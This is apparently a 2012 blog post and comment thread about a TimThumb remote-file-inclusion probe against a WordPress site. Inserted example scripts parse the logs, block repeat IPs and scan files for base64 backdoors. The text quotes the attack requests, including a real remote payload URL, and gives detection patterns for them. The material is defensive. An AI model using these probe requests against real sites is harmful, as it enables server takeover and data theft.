Even Spammers Pretend to be Green!

I guess everyone wants to be green. Why not spammers?

Today, I got hit by this:

188.165.198.194 ( ns3.sensomedia.com : FR ), - -, [04/Jan/2012:10:55:09], "GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/cms-pack/timthumb.php?src=?src=http://www.reel.com.tr/modules/mod_spo/wpsid.txt, q= ,HTTP/1.1", - , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,

For those wondering: is this really spam? Well, do not load that URL in your address bar. You’ll get a scary banned message because it contains the very dangerous “timthumb.php?src=http://yada_yada_yada” pattern. That is an attempt to upload a script that would do something. What, I do not know. Possibly inject viagra ads into my blog. Maybe it wants to turn my blog into a zombie-bot so it can make my blog try to inject viagra ads into your blog. Whatever it is doing, it is not good.

Now, for the “green” part. Notice the “Gigabot/3.0 (http://www.gigablast.com/spider.html)” bit? I googled around and discovered the Gigabot spider makes this claim:

The Green Search Engine
Serving close to ten million queries per day, mostly through other websites, Gigablast is
the leading clean-energy search engine. 90% of its power usage comes from wind energy.

Gigablast also makes it easy to perform your query on the coal-based search engines
by clicking links below the search results. So try us first, and if you don’t find what you
want, click the others.

Interesting. Of course, like it or not, web spiders use energy in the form of, among other things:

  1. electricity to power their own servers.
  2. electricity of servers they hit. That would be the server that runs my blog.
  3. electricity to run everything that communicates information between my server and their server.

Presumably, Gigabot is green because they power their servers with wind energy.

Of course, if their spider is roving around loading a bazillion wrong addresses, the 10% energy savings from wind used by their bot must be outweighed by the energy used by the numerous unnecessary hits to my server. Here’s a sample: dozens of near-identical requests in under three minutes, every one of them a 404.


That only ended when I banned it.

Luckily, I can eliminate part of the wasted energy by blocking IP 188.165.198.194.
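To pick a barrage like this out of the log without reading it by eye, here is an added example (my code, not the blog’s own and not ZBblock’s) that parses the line format quoted above, flags the “timthumb.php?src=http://” pattern from the first section together with the cache/temp follow-up hits, and reports which IP’s burst of 404s warrants a block. The field layout is inferred from the quoted lines, the block thresholds are my choice, and the benign 203.0.113.7 request is constructed.

```python
"""Added example (not the blog's or ZBblock's code): parse the log format quoted
in the post, flag timthumb.php?src=http:// probes, and pick IPs worth blocking."""
import re
from collections import defaultdict
from datetime import datetime

# Field layout inferred from the lines quoted in the post (an assumption, not a
# documented format): ip ( rdns : cc ), auth, [timestamp], "METHOD, host, path,
# q= ,HTTP/x.y", referrer, user-agent, , cc, c= connection, <word> status ,
LINE_RE = re.compile(
    r'^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \( (?P<rdns>\S+) : (?P<cc>\S+) \), '
    r'(?P<auth>[^,]*), \[(?P<ts>[^\]]+)\], '
    r'"(?P<method>[A-Z]+), (?P<host>[^,]+), (?P<path>.*?), q= ,HTTP/[\d.]+", '
    r'(?P<ref>[^,]*), (?P<ua>.*?), , (?P<cc2>\S*), c= (?P<conn>[^,]*), '
    r'\S+ (?P<status>\d{3}) ,\s*$')

# The pattern the post calls out: timthumb.php told via src= to fetch a remote
# URL. The doubled "src=?src=" in the sample still matches, since only some
# src= followed by an http(s):// URL is required.
TIMTHUMB_RFI_RE = re.compile(r'/timthumb\.php\?.*?src=.*?https?://', re.I)
# The follow-up requests seen after each probe: .php files under cache/ or temp/.
CACHE_PROBE_RE = re.compile(r'/(?:cache|temp)/[^/]+\.php$', re.I)
PLUGIN_DIR_RE = re.compile(r'/wp-content/plugins/([^/]+)/')


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec['ts'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S')
    rec['status'] = int(rec['status'])
    return rec


def classify(path):
    """Label a request path as 'timthumb-rfi', 'cache-probe' or 'other'."""
    if TIMTHUMB_RFI_RE.search(path):
        return 'timthumb-rfi'
    if CACHE_PROBE_RE.search(path):
        return 'cache-probe'
    return 'other'


def summarize(lines):
    """Per client IP: request and 404 counts, time span, request kinds, plugin dirs probed."""
    per_ip = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line: skip rather than guess
        s = per_ip.setdefault(rec['ip'], {
            'rdns': rec['rdns'], 'ua': rec['ua'], 'requests': 0, 'not_found': 0,
            'first': rec['ts'], 'last': rec['ts'],
            'kinds': defaultdict(int), 'plugins': set()})
        s['requests'] += 1
        if rec['status'] == 404:
            s['not_found'] += 1
        s['first'] = min(s['first'], rec['ts'])
        s['last'] = max(s['last'], rec['ts'])
        s['kinds'][classify(rec['path'])] += 1
        pm = PLUGIN_DIR_RE.search(rec['path'])
        if pm:
            s['plugins'].add(pm.group(1))
    return per_ip


def block_candidates(per_ip, min_404=5, window_seconds=300):
    """IPs that sent a timthumb probe plus at least min_404 404s within the window.
    The thresholds are this example's choice, not numbers from the post."""
    hits = []
    for ip, s in per_ip.items():
        span = (s['last'] - s['first']).total_seconds()
        if s['kinds']['timthumb-rfi'] and s['not_found'] >= min_404 and span <= window_seconds:
            hits.append(ip)
    return sorted(hits)


# Six lines reproduced from the post's log plus one constructed benign request
# (203.0.113.7 is a documentation address; the browser line is made up).
SAMPLE_LOG = [
    '188.165.198.194 ( ns3.sensomedia.com : FR ), - -, [04/Jan/2012:10:55:09], "GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/cms-pack/timthumb.php?src=?src=http://www.reel.com.tr/modules/mod_spo/wpsid.txt, q= ,HTTP/1.1", - , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,',
    '188.165.198.194 ( ns3.sensomedia.com : FR ), - -, [04/Jan/2012:10:55:10], "GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/cms-pack/cache/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1", - , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,',
    '188.165.198.194 ( ns3.sensomedia.com : FR ), - -, [04/Jan/2012:10:55:11], "GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/cms-pack/temp/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1", - , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,',
    '203.0.113.7 ( example.invalid : US ), - -, [04/Jan/2012:10:55:30], "GET, rankexploits.com, /protect/2011/12/, q= ,HTTP/1.1", - , Mozilla/5.0 (constructed benign browser), , US, c= keep-alive, direct 200 ,',
    '188.165.198.194 ( ns3.sensomedia.com : FR ), - -, [04/Jan/2012:10:56:09], "GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=?src=http://www.reel.com.tr/modules/mod_spo/wpsid.txt, q= ,HTTP/1.1", - , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,',
    '188.165.198.194 ( ns3.sensomedia.com : FR ), - -, [04/Jan/2012:10:56:10], "GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/verve-meta-boxes/tools/cache/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1", - , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,',
    '188.165.198.194 ( ns3.sensomedia.com : FR ), - -, [04/Jan/2012:10:57:50], "GET, rankexploits.com, /protect/2011/12//wp-content/plugins/cms-pack/temp/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1", - , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,',
]

if __name__ == '__main__':
    per_ip = summarize(SAMPLE_LOG)
    for ip, s in per_ip.items():
        span = (s['last'] - s['first']).total_seconds()
        print(f"{ip} ({s['rdns']}): {s['requests']} requests, {s['not_found']} x 404 "
              f"in {span:.0f}s, kinds={dict(s['kinds'])}, plugins={sorted(s['plugins'])}")
    print('block candidates:', block_candidates(per_ip))
```

On the sample, the OVH address shows two timthumb probes and four cache/temp follow-ups across two plugin directories, all 404, and is the only block candidate; the constructed browser request is left alone.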

Mind you: I’m not sure IP 188.165.198.194 really comes from Gigablast. Gigablast is registered in New Mexico. IP 188.165.198.194 resolves to France Paris Ovh Systems. If I searched further I might discover this is a nuclear powered cracker bot; that might account for the non-stop nature of the barrage!

If you are French (and not at IP 188.165.198.194 or any of the other Paris Ovh system IPs I’ve banned), I’d be curious to know something about “France Paris Ovh Systems”. Are they just a huge service provider? If so, the amount of spam from these guys might just arise because of a small fraction of bad customers. Alternatively, if they are a small company, I’m tempted to just ban all of “France Paris Ovh Systems”.

13 thoughts on “Even Spammers Pretend to be Green!”

  1. Are you not tempted to have a go at banning ‘The French’ and be done with it?
    I should add (hurriedly) that I’m a Francophile with a property in Normandy, but the ‘Entente Cordiale’ surely has its limits 🙂

  2. ROFL. Sheer brilliance Lucia.

    If “90% of its power usage comes from wind energy” it’s probably down most of the time.

    And, as a service to civilisation, instead of banning ‘all of “France Paris Ovh Systems” couldn’t you ban all of France period?

  3. I like France!

    But I see lots of crackerbots from that ISP. It doesn’t seem to have gotten itself on Zaphod’s list of bad hosts yet though. (Zaphod is the author of ZBblock. He’s got whole ranges in Mexico, Thailand, China etc. banned. But some of these are so bad I’d rather ban before they even hit my server!)

  4. Gosh–What’s with all this anti-French sentiment? There are two countries moderated:

    Israel– because they have rampant image scrapers one of which is the company that provides Getty Images stuff. And I’ve got a grudge now.

    China– because. Oh… just because!!!

    People from these countries are presented a captcha and can send me a message. The only one from Israel who did is hosted at precisely the company that spammed my blog and brought it to its knees. Then, one of my readers told me about Cloudflare. As soon as I set up a site, I moderated Israel! (Plus, everything from the host Bezeq in Israel is banned.)

    When I cool down, I’ll have to unmoderate Israel….. (Or if someone sends me a note, tells me who they are and lets me make sure they aren’t just some tool sent by Bezeq!)

  5. BTW: The user agents left by spam are getting amusing. Someone supposedly hit the blog using Windows 3.1. How old is that?

    Someone hit with “compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor”. Weird…

    These hit URIs that don’t exist and left non-existent URIs as referrers. (The URIs weren’t nasty; they just don’t exist.)

  6. OVH are a huge hosting company – they host something like 60,000 dedicated servers.

    If you e-mail the IP address and details of the spam to abuse@ovh.net they’ll shut the server down.

  7. Gareth–
    Thanks. I could email abuse departments and sometimes do. The only difficulties are that I would be emailing 4 abuse letters a day — which is time consuming and quite a few systems list an abuse department that really does nothing.

    At a certain point, if a host emits lots of spam, the person on the receiving end has to decide if it’s more time efficient to just ban a system or try to put together information to convince an abuse department that the stuff is, indeed, abuse. I’ll write OVH on this but I’ve discovered info that suggests they might not ban.

    It turns out I was wrong about the OVH not having garnered the hatred of Zaphod who writes and distributes ZBblock. One of their servers has garnered Zaphod’s hatred. OVH IP 188.165.198.194 is “ks380181.kimsufi.com” and ZBblock bounces everything from “kimsufi.com”. But nearby 188.165.246.91 is also OVH and is also “France Paris Ovh Systems” but on “ns3.sensomedia.com”. So, while “sensomedia.com” doesn’t get bounced, OVH seems to be permitted a server to develop a reputation as a spam forum host. If Zaphod put them on the list, this has been going on a while; it’s likely that lots of complaints have gone to the abuse department and nothing has been done.

    Some companies make too much money renting spammers space!

    To those wondering how I logged these if I use ZBblock with WordPress and ZBblock bounces them: I’ve adjusted apache to shunt all ‘wrong’ requests for anything in ‘/wp-content/plugins/’ to hard 404’s instead of going through WP’s “nice” 404 page. I log and then pipe the request through ZBblock afterwards. ZBblock treats them in the manner Zaphod intends. In this case, ZBblock gave the “scary” 403 for multiple issues which included Zaphod’s block for “kimsufi”. If I get enough from “sensomedia.com”, I’ll hard code that into my ZBblock files.

    (I’ll also email abuse, but as I wrote, I’m not very hopeful.)

  8. lucia, you say:

    That is an attempt to upload a script that would do something. What I do not know. Possibly inject viagra ads into my blog. Maybe it wants to turn my blog into a zombie-bot so it can make my bog try to inject viagra ads into your blog. Whatever it is doing, it is not good.

    The last sentence is a massive understatement. I only spent a few minutes looking at what that was trying to do, but already, I can tell it’s “evil.” The impression I get is it would give them complete control of your server. They’d download every file on it and copy everything from your database. They’d then give themselves access to a variety of services on your blog, ranging from file storage, IRC channels, mail spamming and various other nasty stuff (though there doesn’t appear to be anything for using it in a DDOS attack). Even worse, I believe all of it would be done without (necessarily) altering anything which would affect your site’s appearance or functionality, meaning they’d have complete control even as your site keeps running.

    I didn’t spend a lot of time looking into it (there’s a lot involved), so my impression could be off, but it definitely is worse than just trying to inject ads into blogs.

  9. lucia, a comment of mine landed in moderation, presumably because I quoted you using a “bad” word. That amuses me.

  10. Brandon,
    Yes, I can post “viagra”. You can’t. 🙂

    I’m getting a lot of that. I know some visitors have wondered why I am diverted by dealing with this, but I knew it was really, really bad. It’s also rampant.

    Remember New Year’s Eve when I wrote you a question and you said it’s a bad sign when someone is doing this on New Year’s Eve? Well… things were getting increasingly bad. With your help, I modified the redirects in .htaccess so nearly all dangerous bad requests now go to a file called “404.php”. They are logged.

    Based on the logging, I’m
    a) banning things at cloudfront.
    b) writing new custom signatures that all WordPress bloggers should use along with ZBblock. I’ll be advising people to use them.

    Uhmm… I may be needing someone who knows how to advise someone who may have been hacked. (Not me…. I don’t think I got hacked.) But instructions on how non-sophisticates can scan would be useful. There are going to be lots out there because while I didn’t have “timthumb.php” on my blog, lots of people did. Many still do. That’s one of the things these guys are hunting for. When it’s there, they will find it.

    They then turn systems into zombie bots who propagate the havoc.
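    Added example, not lucia’s or Brandon’s code: a small shell filter that reads log lines in the layout quoted in the post, picks out the two request shapes seen there (timthumb.php with a remote src=, and a dropped .php under a plugin’s temp/ directory), and turns repeat offenders into Apache 2.2 “Deny from” lines for .htaccess. The sample lines are constructed to match the post’s format, with the remote payload host replaced by a documentation address; the two-hit threshold is an assumption.

```shell
#!/bin/sh
# Added example, not the blog's own code: pull the client IPs behind
# TimThumb remote-src probes out of log lines shaped like the ones quoted
# in the post, and turn repeat offenders into .htaccess deny rules.

# Constructed sample: two hostile hits in the post's format (remote host
# swapped for 203.0.113.5) plus one ordinary page view from 198.51.100.7.
SAMPLE_LOG='188.165.198.194 ( ns3.sensomedia.com : FR ), - -, [04/Jan/2012:10:55:09], "GET, rankexploits.com, /protect/2011/12/post//wp-content/plugins/cms-pack/timthumb.php?src=?src=http://203.0.113.5/wpsid.txt, q= ,HTTP/1.1", - , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), - -, [04/Jan/2012:10:57:50], "GET, rankexploits.com, /protect/2011/12//wp-content/plugins/cms-pack/temp/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1", - , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
198.51.100.7 ( example.net : US ), - -, [04/Jan/2012:11:02:13], "GET, rankexploits.com, /protect/2011/12/some-post/, q= ,HTTP/1.1", - , Mozilla/5.0, , US, c= close, direct 200 ,'

# Two request shapes from the post: timthumb.php asked to fetch a remote
# src= (the upload attempt), and a .php file under a plugin's temp/
# directory (fetching whatever the first request dropped). Reads stdin,
# prints "<hits> <ip>", most active first.
flag_timthumb_probes() {
    grep -E 'timthumb\.php\?src=[^ ]*https?(:|%3A)|/wp-content/plugins/[^ ]*/temp/[^ ]*\.php' \
        | awk '{ print $1 }' | sort | uniq -c | sort -rn \
        | awk '{ print $1, $2 }'
}

# Apache 2.2 "Deny from" lines for any IP with at least MIN_HITS probes.
# The threshold is an assumption; tune it to your own traffic.
MIN_HITS=2
deny_rules() {
    flag_timthumb_probes | awk -v min="$MIN_HITS" '$1 >= min { print "Deny from " $2 }'
}

# Stand-alone run over the constructed sample.
printf '%s\n' "$SAMPLE_LOG" | deny_rules
```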

  11. lucia:

    Yes, I can post “xxxxxx”. You can’t.

    Censorship I say!

    Remember New Year’s Eve when I wrote you a question and you said it’s a bad sign when someone is doing this on New Year’s Eve? Well… things were getting increasingly bad. With your help, I modified the redirects in .htaccess so nearly all dangerous bad requests now go to a file called “404.php”. They are logged.

    It sounds like it must have been quite bad to make you work on it on the holidays. I’m glad I was able to help, though it seems strange your site is getting hit that much.

    Uhmm… I may be needing someone who knows how to advise someone who may have been hacked. (Not me…. I don’t think I got hacked.) But instructions on how non-sophisticates can scan would be useful. There are going to be lots out there because while I didn’t have “timthumb.php” on my blog, lots of people did.

    Truth be told, if you don’t know what you’re doing, you can’t hope to tell if you’ve been hacked. There are some things you can do, like looking for specific files commonly uploaded by people exploiting that vulnerability and checking to see if your timthumb.php file is up-to-date, but it won’t mean a lot.

    A good hacker won’t be caught by things like that. He could easily exploit a vulnerability to give himself full control of your server then update it so it couldn’t be done again. This prevents someone else from stealing the server from him, and it makes it harder to detect what he’s done. In the same way, a hacker could use his access to change your MySQL password, but a good one won’t. He won’t want to tip you off. Instead, he’ll let you keep using it like normal and just steal whatever information he wants.

    What you have to realize is a vulnerability like the timthumb.php vulnerability gives the person full control of your server. That’s literally full control. This means he can modify any file on it however he wants (that includes things like .htaccess files). Unless you can examine everything on your server and know it hasn’t been altered, you can’t be sure you haven’t been hacked.

    If you’re truly worried you may have been hacked and you aren’t particularly knowledgeable, your only real option is to reinstall. Wipe out everything on the server and start over. You don’t need to recreate your database (since tables can’t store executable code), but you should at least change its password. Do that and get a clean install of WordPress, and you should be fine. Afterward, you can restore files from a backup you’ve created (either in the past, or immediately before wiping the server) as long as you’re sure they haven’t been altered. Otherwise, you should get clean copies of them too. Once you’re finished with that, you should do whatever normal security things you’d do when setting up your blog (like making sure permissions on files are right, etc).

    If you really don’t want to reinstall, there are a number of options available. Offhand, I’d say you should search for the files commonly created or altered by people exploiting this vulnerability. If it’s one created by them, delete it. Otherwise, it needs to be checked for changes, or just replaced. Also, you should search files for any instances of “base64” (it has some legitimate reasons for being in files, but it’s usually used to create a “backdoor” into the server). That can most easily be done with grep through the command line, but you should be able to write a PHP script to do it.

    I’m sure there’s a lot more you can do, but this is long enough already.
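    Added example, not Brandon’s or the blog’s code: the file checks suggested above (files that eval base64-decoded data, every timthumb.php copy with its version, and PHP sitting under wp-content/uploads), run over a constructed WordPress-like tree. It assumes timthumb’s own define('VERSION', ...) line identifies a copy’s release; the paths and the 1.19 version in the fixture are made up.

```shell
#!/bin/sh
# Added example, not the commenter's or the blog's code: three file checks
# a site owner can run before deciding whether to reinstall.

# Constructed fixture. Assumes timthumb's own define('VERSION', ...) line
# is what identifies a copy's release; the 1.19 here is made up.
make_fixture() {
    dir=$(mktemp -d)
    mkdir -p "$dir/wp-content/plugins/cms-pack/temp" \
             "$dir/wp-content/themes/t" "$dir/wp-content/uploads/2012/01"
    # Backdoor shape: eval of a base64 blob (this one decodes to "echo 1;").
    printf '<?php eval(base64_decode("ZWNobyAxOw==")); ?>\n' \
        > "$dir/wp-content/plugins/cms-pack/temp/x.php"
    # Legitimate base64 use, which should not be flagged by itself.
    printf '<?php $d = base64_encode(file_get_contents("a.png")); ?>\n' \
        > "$dir/wp-content/themes/t/img.php"
    printf '<?php define("VERSION", "1.19"); ?>\n' \
        > "$dir/wp-content/themes/t/timthumb.php"
    # PHP has no business under uploads/, wherever it came from.
    printf '<?php echo "constructed placeholder"; ?>\n' \
        > "$dir/wp-content/uploads/2012/01/shell.php"
    echo "$dir"
}

# PHP files that feed base64_decode() output straight into eval(): the
# usual one-line backdoor. Plain base64 use alone is not enough to match.
find_eval_backdoors() {
    grep -rlE --include='*.php' 'eval *\(.*base64_decode' "$1" | sort
}

# Every timthumb.php under the tree with its VERSION define, so the owner
# can compare each copy against the current release.
list_timthumb_copies() {
    find "$1" -type f -name 'timthumb.php' | sort | while read -r f; do
        v=$(grep -oE 'VERSION.?, *.?[0-9]+(\.[0-9]+)*' "$f" | grep -oE '[0-9]+(\.[0-9]+)*$')
        echo "$f ${v:-unknown}"
    done
}

# wp-content/uploads should hold media only; any .php there is suspect.
find_php_in_uploads() {
    find "$1/wp-content/uploads" -type f -name '*.php' 2>/dev/null | sort
}

# Stand-alone run over the fixture, then clean up.
root=$(make_fixture)
find_eval_backdoors "$root"; list_timthumb_copies "$root"; find_php_in_uploads "$root"
rm -rf "$root"
```

Run the three functions against your real document root instead of the fixture; anything they list needs a clean copy or a deliberate decision that it belongs there.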

  12. Oh yeah, I forgot to mention one really obvious thing. If someone is worried about their blog, it’s easy to find a scanner to check if they need to update their timthumb.php file. A quick search with Google is all you need.

    It won’t tell you if someone’s broken into a server, but it is still good information to have.

Comments are closed.